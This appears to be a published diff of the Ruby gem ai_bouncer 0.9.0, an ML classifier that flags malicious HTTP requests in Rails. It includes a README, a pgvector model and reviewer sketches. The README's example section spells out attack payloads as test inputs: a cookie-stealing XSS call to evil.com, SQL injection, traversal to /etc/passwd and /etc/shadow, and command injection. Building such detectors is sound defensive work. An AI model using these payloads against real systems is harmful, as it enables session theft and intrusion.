ai_bouncer 0.9.0

checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: c2a072917e797b85ac093208f69570b74484953862798ee4ff7225094014b2ed
4
+ data.tar.gz: 955abb9f068b1f9d987cb7c7a721c9e217f155d17122bfc71af08d12270e3114
5
+ SHA512:
6
+ metadata.gz: 672305a2780b60b00bb2fd894b01695a921f23386de7346ba12e6592efcf317d3c4052c6f3bd8d15c8933be1a4a3b69747822799330a27eb60f93535719d50f5
7
+ data.tar.gz: b2e0a367c5f93753bfc223189d33b9e9faa2e7a95be32408cb95ad9a30232331b7369030fc08040db920fe19c623a5e8c58e85eaed36f0acb993e83b2477df03
data/CHANGELOG.md ADDED
@@ -0,0 +1,55 @@
1
+ # Changelog
2
+
3
+ All notable changes to this project will be documented in this file.
4
+
5
+ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
6
+ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
7
+
8
+ ## [0.9.0] - 2025-01-17
9
+
10
+ ### Added
11
+
12
+ - **Core Classification Engine**
13
+ - Model2Vec-based text embeddings via ONNX Runtime
14
+ - KNN classifier with cosine similarity for attack detection
15
+ - Support for 8 classification labels: seven attack types (SQLi, XSS, path traversal, command injection, credential stuffing, spam bots, scanners) plus clean traffic
16
+
17
+ - **Rails Integration**
18
+ - Rack middleware for automatic request classification
19
+ - Controller concern with `protect_from_attacks` DSL
20
+ - Configurable actions: `:block`, `:log`, `:challenge`
21
+ - Callbacks for attack detection and monitoring
22
+
23
+ - **Storage Options**
24
+ - In-memory mode (default): ~2ms latency, ~30MB RAM
25
+ - Database mode: PostgreSQL + pgvector via neighbor gem
26
+
27
+ - **Auto-Download**
28
+ - Model files automatically downloaded from HuggingFace on first use
29
+ - Hosted at [huggingface.co/khasinski/ai-bouncer](https://huggingface.co/khasinski/ai-bouncer)
30
+
31
+ - **Generators**
32
+ - `rails generate ai_bouncer:install` - Creates initializer
33
+ - `rails generate ai_bouncer:migration` - Creates pgvector migration
34
+
35
+ - **Rake Tasks**
36
+ - `ai_bouncer:download` - Download model files
37
+ - `ai_bouncer:seed` - Seed database with attack patterns
38
+ - `ai_bouncer:stats` - Show pattern statistics
39
+ - `ai_bouncer:test` - Test classification
40
+ - `ai_bouncer:benchmark` - Benchmark performance
41
+
42
+ ### Model
43
+
44
+ - 3,053 attack pattern vectors
45
+ - Trained on SecLists, CSIC 2010, ModSecurity CRS, and real nginx logs
46
+ - 92%+ accuracy on test set
47
+
48
+ ## [Unreleased]
49
+
50
+ ### Planned
51
+
52
+ - Rate limiting integration
53
+ - IP reputation scoring
54
+ - Custom pattern training interface
55
+ - Prometheus metrics export
data/LICENSE.txt ADDED
@@ -0,0 +1,21 @@
1
+ The MIT License (MIT)
2
+
3
+ Copyright (c) 2025 Chris Hasinski
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in
13
+ all copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21
+ THE SOFTWARE.
data/README.md ADDED
@@ -0,0 +1,449 @@
1
+ # AiBouncer
2
+
3
+ [![CI](https://github.com/khasinski/ai_bouncer/actions/workflows/ci.yml/badge.svg)](https://github.com/khasinski/ai_bouncer/actions/workflows/ci.yml)
4
+ [![Gem Version](https://badge.fury.io/rb/ai_bouncer.svg)](https://badge.fury.io/rb/ai_bouncer)
5
+
6
+ AI-powered HTTP request classification for Ruby on Rails. Detect credential stuffing, SQL injection, XSS, and other attacks using ML embeddings.
7
+
8
+ ## Features
9
+
10
+ - **Fast**: ~2ms inference time (memory mode)
11
+ - **Lightweight**: ~31MB total model size
12
+ - **Accurate**: 92%+ detection rate on common attacks
13
+ - **Flexible Storage**: In-memory or PostgreSQL + pgvector
14
+ - **Easy to integrate**: Drop-in middleware or controller concern
15
+ - **Configurable**: Protect specific paths, customize responses
16
+
17
+ ## Attack Types Detected
18
+
19
+ - SQL Injection (SQLi)
20
+ - Cross-Site Scripting (XSS)
21
+ - Path Traversal
22
+ - Command Injection
23
+ - Credential Stuffing
24
+ - Spam Bots
25
+ - Vulnerability Scanners
26
+
27
+ ## Requirements
28
+
29
+ - Ruby >= 3.2 (required by onnxruntime)
30
+ - Rails 6.1+ (optional, for middleware/concern integration)
31
+
32
+ ## Installation
33
+
34
+ Add to your Gemfile:
35
+
36
+ ```ruby
37
+ gem 'ai_bouncer'
38
+
39
+ # Optional: for database storage mode
40
+ gem 'neighbor'
41
+ ```
42
+
43
+ Then run the installer:
44
+
45
+ ```bash
46
+ bundle install
47
+ rails generate ai_bouncer:install
48
+ ```
49
+
50
+ This creates `config/initializers/ai_bouncer.rb`. Model files (~31MB) are **auto-downloaded** on first request.
51
+
52
+ ### Manual Download (Optional)
53
+
54
+ If you prefer to bundle model files with your app:
55
+
56
+ ```bash
57
+ # Download from HuggingFace
58
+ pip install huggingface_hub
59
+ huggingface-cli download khasinski/ai-bouncer --local-dir vendor/ai_bouncer
60
+
61
+ # Then disable auto-download in config/initializers/ai_bouncer.rb (Ruby, not shell):
62
+ #   config.auto_download = false
63
+ ```
64
+
65
+ ## Storage Modes
66
+
67
+ ### Memory Mode (Default)
68
+
69
+ Vectors are kept in memory. Fast and simple.
70
+
71
+ ```ruby
72
+ config.storage = :memory
73
+ ```
74
+
75
+ **Pros**: ~2ms latency, no database required
76
+ **Cons**: ~31MB RAM usage, patterns fixed at deploy time
77
+
78
+ ### Database Mode
79
+
80
+ Vectors are stored in PostgreSQL using pgvector.
81
+
82
+ ```ruby
83
+ config.storage = :database
84
+ ```
85
+
86
+ **Pros**: Scalable, add custom patterns at runtime, persistent
87
+ **Cons**: ~5ms latency, requires pgvector
88
+
89
+ #### Database Setup
90
+
91
+ 1. Install pgvector: https://github.com/pgvector/pgvector
92
+
93
+ 2. Generate and run migration:
94
+ ```bash
95
+ rails generate ai_bouncer:migration
96
+ rails db:migrate
97
+ ```
98
+
99
+ 3. Seed the bundled patterns:
100
+ ```bash
101
+ rails ai_bouncer:seed
102
+ ```
103
+
104
+ 4. Verify:
105
+ ```bash
106
+ rails ai_bouncer:stats
107
+ ```
108
+
109
+ ## Configuration
110
+
111
+ ```ruby
112
+ # config/initializers/ai_bouncer.rb
113
+
114
+ AiBouncer.configure do |config|
115
+ config.enabled = Rails.env.production?
116
+ config.storage = :memory # or :database
117
+
118
+ # Paths to protect (for middleware)
119
+ config.protected_paths = [
120
+ "/login",
121
+ "/register",
122
+ "/api/*",
123
+ ]
124
+
125
+ # Action when attack detected
126
+ config.action = :block # :block, :challenge, or :log
127
+ config.threshold = 0.3
128
+
129
+ # Model files location
130
+ config.model_path = Rails.root.join("vendor", "ai_bouncer")
131
+
132
+ # Callback for monitoring
133
+ config.on_attack_detected = ->(request:, classification:, action:) {
134
+ Rails.logger.warn "Attack: #{classification[:label]} from #{request.ip}"
135
+ }
136
+ end
137
+ ```
138
+
139
+ ## Usage
140
+
141
+ ### Option 1: Middleware (Automatic)
142
+
143
+ The middleware automatically protects configured paths. It extracts method, path, body, user-agent, and params from Rails requests - no manual formatting needed:
144
+
145
+ ```ruby
146
+ # A request like this:
147
+ # POST /login HTTP/1.1
148
+ # User-Agent: Mozilla/5.0...
149
+ # Content-Type: application/x-www-form-urlencoded
150
+ #
151
+ # username=admin'--&password=x
152
+
153
+ # Is automatically classified as:
154
+ # => { label: "sqli", confidence: 0.94, is_attack: true }
155
+ ```
156
+
157
+ ### Option 2: Controller Concern (Fine-grained)
158
+
159
+ For more control, use the controller concern:
160
+
161
+ ```ruby
162
+ class SessionsController < ApplicationController
163
+ include AiBouncer::ControllerConcern
164
+
165
+ # Protect all actions
166
+ protect_from_attacks
167
+
168
+ # Or protect specific actions with custom options
169
+ protect_from_attacks only: [:create],
170
+ threshold: 0.5,
171
+ action: :block
172
+ end
173
+ ```
174
+
175
+ Or check manually:
176
+
177
+ ```ruby
178
+ class PaymentsController < ApplicationController
179
+ include AiBouncer::ControllerConcern
180
+
181
+ def create
182
+ check_for_attack # Blocks if attack detected
183
+
184
+ # Normal flow continues...
185
+ end
186
+ end
187
+ ```
188
+
189
+ ### Option 3: Manual Classification
190
+
191
+ ```ruby
192
+ result = AiBouncer.classify(
193
+ AiBouncer.request_to_text(
194
+ method: "POST",
195
+ path: "/login",
196
+ body: "username=admin'--&password=x",
197
+ user_agent: "python-requests/2.28"
198
+ )
199
+ )
200
+
201
+ result
202
+ # => {
203
+ # label: "sqli",
204
+ # confidence: 0.94,
205
+ # is_attack: true,
206
+ # latency_ms: 2.1
207
+ # }
208
+ ```
209
+
210
+ ## Adding Custom Patterns (Database Mode)
211
+
212
+ ```ruby
213
+ # Add a pattern for a specific attack you've seen
214
+ embedding = AiBouncer.model.embed("POST /admin.php?cmd=wget...")
215
+
216
+ AiBouncer::AttackPattern.create!(
217
+ label: "scanner",
218
+ severity: "high",
219
+ embedding: embedding,
220
+ sample_text: "POST /admin.php?cmd=wget...",
221
+ source: "incident_2024_01"
222
+ )
223
+ ```
224
+
225
+ ## Rake Tasks
226
+
227
+ ```bash
228
+ # Download model files manually (auto-download is enabled by default)
229
+ rails ai_bouncer:download
230
+
231
+ # Seed bundled patterns into database (database mode only)
232
+ rails ai_bouncer:seed
233
+
234
+ # Show statistics
235
+ rails ai_bouncer:stats
236
+
237
+ # Test classification
238
+ rails ai_bouncer:test
239
+
240
+ # Benchmark performance
241
+ rails ai_bouncer:benchmark
242
+ ```
243
+
244
+ ## Real-World Examples
245
+
246
+ ### SQL Injection
247
+
248
+ ```ruby
249
+ # Authentication bypass
250
+ AiBouncer.classify("POST /login username=admin' OR '1'='1 password=x")
251
+ # => { label: "sqli", confidence: 0.94, is_attack: true }
252
+
253
+ # UNION-based data extraction
254
+ AiBouncer.classify("GET /users?id=1 UNION SELECT username,password FROM users--")
255
+ # => { label: "sqli", confidence: 0.96, is_attack: true }
256
+
257
+ # Blind SQL injection
258
+ AiBouncer.classify("GET /products?id=1 AND SLEEP(5)")
259
+ # => { label: "sqli", confidence: 0.91, is_attack: true }
260
+ ```
261
+
262
+ ### Cross-Site Scripting (XSS)
263
+
264
+ ```ruby
265
+ # Script injection in comments
266
+ AiBouncer.classify("POST /comments body=<script>document.location='http://evil.com/steal?c='+document.cookie</script>")
267
+ # => { label: "xss", confidence: 0.96, is_attack: true }
268
+
269
+ # Event handler injection
270
+ AiBouncer.classify("POST /profile bio=<img src=x onerror=alert('XSS')>")
271
+ # => { label: "xss", confidence: 0.93, is_attack: true }
272
+
273
+ # SVG-based XSS
274
+ AiBouncer.classify("POST /upload filename=<svg onload=alert(1)>.svg")
275
+ # => { label: "xss", confidence: 0.89, is_attack: true }
276
+ ```
277
+
278
+ ### Credential Stuffing
279
+
280
+ ```ruby
281
+ # Automated login attempts with browser-like UA (common in credential stuffing botnets)
282
+ AiBouncer.classify("POST /wp-login.php UA:Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120")
283
+ # => { label: "credential_stuffing", confidence: 0.94, is_attack: true }
284
+
285
+ # High-frequency login pattern
286
+ AiBouncer.classify("POST /wp-login.php UA:Mozilla/5.0 (X11; Ubuntu; Linux x86_64) Chrome/119")
287
+ # => { label: "credential_stuffing", confidence: 0.92, is_attack: true }
288
+ ```
289
+
290
+ ### Spam Bots
291
+
292
+ ```ruby
293
+ # Comment spam with referrer pattern
294
+ AiBouncer.classify("POST /wp-comments-post.php REF:https://example.com/blog/article UA:Mozilla/5.0 (Windows NT 6.3) Chrome/103")
295
+ # => { label: "spam_bot", confidence: 0.91, is_attack: true }
296
+
297
+ # Old browser version (common in botnets)
298
+ AiBouncer.classify("POST /contact UA:Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/56.0.2924.87")
299
+ # => { label: "spam_bot", confidence: 0.87, is_attack: true }
300
+ ```
301
+
302
+ ### Vulnerability Scanners
303
+
304
+ ```ruby
305
+ # WordPress plugin scanning with bot UA
306
+ AiBouncer.classify("GET /wp-content/plugins/register-plus-redux UA:Mozilla/5.0 Chrome/126")
307
+ # => { label: "scanner", confidence: 0.89, is_attack: true }
308
+
309
+ # Registration page probing with bot UA
310
+ AiBouncer.classify("GET /wp-login.php?action=register UA:Go-http-client/2.0")
311
+ # => { label: "scanner", confidence: 0.85, is_attack: true }
312
+ ```
313
+
314
+ > **Note**: Scanner detection works best when combined with user-agent analysis. Pure path scanning without suspicious UA may be classified as other attack types.
315
+
316
+ ### Path Traversal
317
+
318
+ ```ruby
319
+ # Directory traversal to read system files
320
+ AiBouncer.classify("GET /files?path=../../../etc/passwd")
321
+ # => { label: "path_traversal", confidence: 0.89, is_attack: true }
322
+
323
+ # Encoded traversal
324
+ AiBouncer.classify("GET /download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow")
325
+ # => { label: "path_traversal", confidence: 0.87, is_attack: true }
326
+
327
+ # Windows path traversal
328
+ AiBouncer.classify("GET /files?name=....\\....\\....\\windows\\system32\\config\\sam")
329
+ # => { label: "path_traversal", confidence: 0.86, is_attack: true }
330
+ ```
331
+
332
+ ### Command Injection
333
+
334
+ ```ruby
335
+ # Shell command in parameter
336
+ AiBouncer.classify("GET /ping?host=127.0.0.1;cat /etc/passwd")
337
+ # => { label: "command_injection", confidence: 0.93, is_attack: true }
338
+
339
+ # Backtick injection
340
+ AiBouncer.classify("POST /convert filename=`whoami`.pdf")
341
+ # => { label: "command_injection", confidence: 0.90, is_attack: true }
342
+
343
+ # Pipeline injection
344
+ AiBouncer.classify("GET /search?q=test|ls -la")
345
+ # => { label: "command_injection", confidence: 0.88, is_attack: true }
346
+ ```
347
+
348
+ ### Clean Requests (No False Positives)
349
+
350
+ ```ruby
351
+ # Normal login
352
+ AiBouncer.classify("POST /login username=john.doe@example.com password=secretpass123")
353
+ # => { label: "clean", confidence: 0.92, is_attack: false }
354
+
355
+ # Normal API request
356
+ AiBouncer.classify("GET /api/users/123")
357
+ # => { label: "clean", confidence: 0.91, is_attack: false }
358
+
359
+ # Paginated API request
360
+ AiBouncer.classify("GET /api/products?page=1&limit=20")
361
+ # => { label: "clean", confidence: 0.99, is_attack: false }
362
+
363
+ # Normal form submission
364
+ AiBouncer.classify("POST /contact name=John Smith&email=john@example.com&message=Hello")
365
+ # => { label: "clean", confidence: 0.95, is_attack: false }
366
+ ```
367
+
368
+ ## Classification Result
369
+
370
+ ```ruby
371
+ {
372
+ label: "sqli", # Attack type or "clean"
373
+ confidence: 0.94, # 0.0 - 1.0
374
+ is_attack: true, # Boolean
375
+ latency_ms: 2.1, # Inference time
376
+ storage: :memory, # or :database
377
+ nearest_distance: 0.06, # Distance to nearest pattern
378
+ neighbors: [ # K nearest neighbors
379
+ { label: "sqli", distance: 0.06 },
380
+ { label: "sqli", distance: 0.08 },
381
+ ...
382
+ ]
383
+ }
384
+ ```
385
+
386
+ ## Performance
387
+
388
+ Benchmarks on Apple Silicon:
389
+
390
+ | Mode | Mean | P50 | P99 |
391
+ |------|------|-----|-----|
392
+ | Memory | 2ms | 2ms | 3ms |
393
+ | Database | 5ms | 4ms | 8ms |
394
+
395
+ ## Model Files
396
+
397
+ Model is hosted on HuggingFace: [khasinski/ai-bouncer](https://huggingface.co/khasinski/ai-bouncer)
398
+
399
+ Auto-downloaded to `vendor/ai_bouncer/` on first request:
400
+
401
+ | File | Size | Description |
402
+ |------|------|-------------|
403
+ | `embedding_model.onnx` | 29 MB | Model2Vec ONNX model |
404
+ | `vocab.json` | 550 KB | Tokenizer vocabulary |
405
+ | `vectors.bin` | 1.1 MB | Attack pattern vectors (memory mode) |
406
+ | `labels.json` | 28 KB | Labels and metadata |
407
+
408
+ ## How It Works
409
+
410
+ 1. **Tokenize**: Request → Unigram tokens
411
+ 2. **Embed**: Tokens → 256-dim vector (Model2Vec via ONNX)
412
+ 3. **Search**: Find k=5 nearest attack patterns
413
+ 4. **Vote**: Weighted voting on attack type
414
+ 5. **Decide**: Block if confidence > threshold
415
+
416
+ ## Contributing Training Data
417
+
418
+ **Help make AiBouncer better!** The model currently uses a small dataset (~1,000 patterns) derived from:
419
+ - Public security payloads (SecLists, fuzzdb)
420
+ - CSIC 2010 HTTP dataset
421
+ - A sample of real nginx logs
422
+
423
+ I'd love to gather more **real-world traffic data** to improve detection accuracy. If you have access to:
424
+
425
+ - **Attack logs** - Blocked requests from your WAF, failed login attempts, spam submissions
426
+ - **Clean traffic** - Normal API requests, legitimate form submissions
427
+ - **False positives** - Requests that were incorrectly flagged as attacks
428
+
429
+ Please consider contributing! You can:
430
+
431
+ 1. **Share anonymized logs** - Remove sensitive data (IPs, emails, passwords) and open an issue
432
+ 2. **Report misclassifications** - Let me know what the model gets wrong
433
+ 3. **Add labeled samples** - PRs with new attack patterns are welcome
434
+
435
+ The more diverse real-world data we have, the better the model becomes for everyone.
436
+
437
+ Contact: Open an issue at [github.com/khasinski/ai_bouncer](https://github.com/khasinski/ai_bouncer/issues)
438
+
439
+ ## License
440
+
441
+ MIT License.
442
+
443
+ ## Contributing Code
444
+
445
+ 1. Fork it
446
+ 2. Create your feature branch
447
+ 3. Commit your changes
448
+ 4. Push to the branch
449
+ 5. Create a Pull Request
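
Reviewer note on the README's "Model Files" and "How It Works" sections: the sketch below illustrates the memory-mode search step on toy data. It assumes the vector file is a row-major blob of little-endian float32 values, which matches how the seeding code in this release unpacks `vectors.bin` with `"e*"`. The helper names `decode_vectors`, `cosine_distance`, and `nearest` are hypothetical and are not part of the AiBouncer API; the real vectors are 256-dimensional, while the example uses 3 dimensions to stay readable.

```ruby
# frozen_string_literal: true

# Hypothetical helpers for illustration only; not AiBouncer's own code.

# Decode a packed little-endian float32 blob into rows of `dim` floats.
def decode_vectors(blob, dim)
  blob.unpack("e*").each_slice(dim).to_a
end

# Cosine distance = 1 - cosine similarity (0.0 means same direction).
def cosine_distance(a, b)
  dot = a.zip(b).sum { |x, y| x * y }
  norm = Math.sqrt(a.sum { |x| x * x }) * Math.sqrt(b.sum { |x| x * x })
  return 1.0 if norm.zero?

  1.0 - dot / norm
end

# Return the k nearest patterns as { label:, distance: } hashes, nearest first.
def nearest(query, vectors, labels, k: 5)
  vectors.each_with_index
         .map { |vec, i| { label: labels[i], distance: cosine_distance(query, vec) } }
         .min_by(k) { |n| n[:distance] }
end

# Toy data: three 3-dim patterns packed the same way as the binary file.
labels = %w[sqli xss clean]
blob = [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0].pack("e*")
vectors = decode_vectors(blob, 3)

result = nearest([0.9, 0.1, 0.0], vectors, labels, k: 2)
puts result.first[:label] # prints "sqli"
```

A brute-force scan like this is linear in the number of patterns, which is plausible for a few thousand vectors; database mode delegates the same search to pgvector.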
@@ -0,0 +1,155 @@
1
+ # frozen_string_literal: true
2
+
3
+ module AiBouncer
4
+ # ActiveRecord model for storing attack pattern vectors
5
+ # Uses pgvector via the neighbor gem for fast similarity search
6
+ #
7
+ # Usage:
8
+ # # Find similar patterns
9
+ # embedding = AiBouncer.model.embed("POST /login username=admin' OR '1'='1")
10
+ # patterns = AiBouncer::AttackPattern.nearest_neighbors(:embedding, embedding, distance: "cosine").limit(5)
11
+ #
12
+ # # Classify request
13
+ # result = AiBouncer::AttackPattern.classify(embedding, k: 5)
14
+ #
15
+ class AttackPattern < ActiveRecord::Base
16
+ self.table_name = "attack_patterns"
17
+
18
+ # Include neighbor for vector similarity search
19
+ # Requires: gem "neighbor" in Gemfile
20
+ if defined?(Neighbor)
21
+ has_neighbors :embedding
22
+ end
23
+
24
+ ATTACK_LABELS = %w[sqli xss path_traversal command_injection credential_stuffing spam_bot scanner].freeze
25
+ SEVERITIES = %w[low medium high critical].freeze
26
+
27
+ validates :label, presence: true, inclusion: { in: ATTACK_LABELS + ["clean"] }
28
+ validates :severity, inclusion: { in: SEVERITIES }, allow_nil: true
29
+ validates :embedding, presence: true
30
+
31
+ scope :attacks_only, -> { where.not(label: "clean") }
32
+ scope :by_label, ->(label) { where(label: label) }
33
+ scope :by_severity, ->(severity) { where(severity: severity) }
34
+
35
+ # Classify an embedding using KNN voting
36
+ # Returns hash with label, confidence, neighbors, etc.
37
+ def self.classify(embedding, k: 5)
38
+ unless defined?(Neighbor)
39
+ raise AiBouncer::Error, "neighbor gem required for database classification. Add 'gem \"neighbor\"' to your Gemfile."
40
+ end
41
+
42
+ start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
43
+
44
+ # Find k nearest neighbors using cosine distance
45
+ neighbors = nearest_neighbors(:embedding, embedding, distance: "cosine")
46
+ .limit(k)
47
+ .select(:id, :label, :severity, :sample_text)
48
+
49
+ # Get distances (neighbor gem returns them via neighbor_distance)
50
+ neighbor_data = neighbors.map do |n|
51
+ {
52
+ id: n.id,
53
+ label: n.label,
54
+ severity: n.severity,
55
+ distance: n.neighbor_distance,
56
+ similarity: 1.0 - n.neighbor_distance
57
+ }
58
+ end
59
+
60
+ result = compute_result(neighbor_data)
61
+
62
+ end_time = Process.clock_gettime(Process::CLOCK_MONOTONIC)
63
+ result[:latency_ms] = ((end_time - start_time) * 1000).round(2)
64
+ result[:storage] = :database
65
+
66
+ result
67
+ end
68
+
69
+ # Batch import embeddings from bundled data
70
+ def self.seed_from_bundled_data!(model_path: nil)
71
+ model_path ||= AiBouncer.configuration.model_path
72
+ raise AiBouncer::ConfigurationError, "model_path not configured" unless model_path
73
+
74
+ vectors_path = File.join(model_path, "vectors.bin")
75
+ labels_path = File.join(model_path, "labels.json")
76
+
77
+ unless File.exist?(vectors_path) && File.exist?(labels_path)
78
+ raise AiBouncer::ModelNotFoundError, "Bundled data not found at #{model_path}"
79
+ end
80
+
81
+ # Load labels metadata
82
+ labels_data = JSON.parse(File.read(labels_path))
83
+ labels = labels_data["labels"]
84
+ severities = labels_data["severities"]
85
+ num_vectors = labels_data["num_vectors"]
86
+ dim = labels_data["dim"]
87
+
88
+ # Load vectors (binary float32)
89
+ data = File.binread(vectors_path)
90
+ floats = data.unpack("e*") # little-endian float32
91
+
92
+ vectors = []
93
+ floats.each_slice(dim) { |row| vectors << row }
94
+
95
+ # Clear existing data
96
+ delete_all
97
+
98
+ # Batch insert
99
+ records = vectors.each_with_index.map do |vec, i|
100
+ {
101
+ label: labels[i],
102
+ severity: severities[i],
103
+ embedding: vec,
104
+ source: "bundled",
105
+ created_at: Time.current,
106
+ updated_at: Time.current
107
+ }
108
+ end
109
+
110
+ # Insert in batches of 500
111
+ records.each_slice(500) do |batch|
112
+ insert_all(batch)
113
+ end
114
+
115
+ count
116
+ end
117
+
118
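+ # A bare `private` has no effect on `def self.` methods, so the helper is hidden explicitly.
119
+
120
+ private_class_method def self.compute_result(neighbors)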
121
+ return { label: "clean", confidence: 0.0, is_attack: false } if neighbors.empty?
122
+
123
+ # Vote on label, weighting each neighbor by its cosine similarity (1 - distance)
124
+ votes = Hash.new(0.0)
125
+
126
+ neighbors.each do |n|
127
+ weight = n[:similarity]
128
+ votes[n[:label]] += weight
129
+ end
130
+
131
+ # Get winner
132
+ predicted_label = votes.max_by { |_, v| v }&.first || "clean"
133
+
134
+ # Compute confidence
135
+ nearest_distance = neighbors.first[:distance]
136
+ confidence = 1.0 - nearest_distance
137
+
138
+ # Adjust by voting margin
139
+ total_weight = votes.values.sum
140
+ winner_weight = votes[predicted_label]
141
+ voting_confidence = total_weight > 0 ? winner_weight / total_weight : 0
142
+
143
+ final_confidence = (confidence + voting_confidence) / 2
144
+
145
+ {
146
+ label: predicted_label,
147
+ confidence: final_confidence.round(4),
148
+ is_attack: predicted_label != "clean",
149
+ nearest_distance: nearest_distance.round(4),
150
+ neighbors: neighbors.map { |n| { label: n[:label], distance: n[:distance].round(4) } },
151
+ votes: votes.transform_values { |v| v.round(4) }
152
+ }
153
+ end
154
+ end
155
+ end
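
Reviewer note on `compute_result`: the confidence arithmetic can be checked without a database. The sketch below restates the same voting logic as a standalone function, under the assumption that each neighbor is a hash with `:label` and `:distance` and that the list is ordered nearest first. The name `knn_vote` is hypothetical; it is a reading aid, not the gem's API.

```ruby
# frozen_string_literal: true

# Standalone restatement of the similarity-weighted KNN vote (illustrative only).
def knn_vote(neighbors)
  return { label: "clean", confidence: 0.0, is_attack: false } if neighbors.empty?

  # Each neighbor votes for its label with weight = similarity = 1 - distance.
  votes = Hash.new(0.0)
  neighbors.each { |n| votes[n[:label]] += 1.0 - n[:distance] }

  label, winner_weight = votes.max_by { |_, weight| weight }
  total = votes.values.sum

  # Share of the total vote weight held by the winning label.
  share = total.positive? ? winner_weight / total : 0.0
  # Proximity of the single nearest pattern.
  proximity = 1.0 - neighbors.first[:distance]

  {
    label: label,
    confidence: ((proximity + share) / 2).round(4),
    is_attack: label != "clean"
  }
end

neighbors = [
  { label: "sqli", distance: 0.06 },
  { label: "sqli", distance: 0.08 },
  { label: "clean", distance: 0.30 }
]

result = knn_vote(neighbors)
p result
```

With these three neighbors the votes are 1.86 for `sqli` and 0.70 for `clean`, so the vote share is about 0.7266, the proximity term is 0.94, and the averaged confidence rounds to 0.8333. Since cosine distance can range up to 2, the proximity term can drop below zero when the nearest pattern points away from the query, which may be worth clamping.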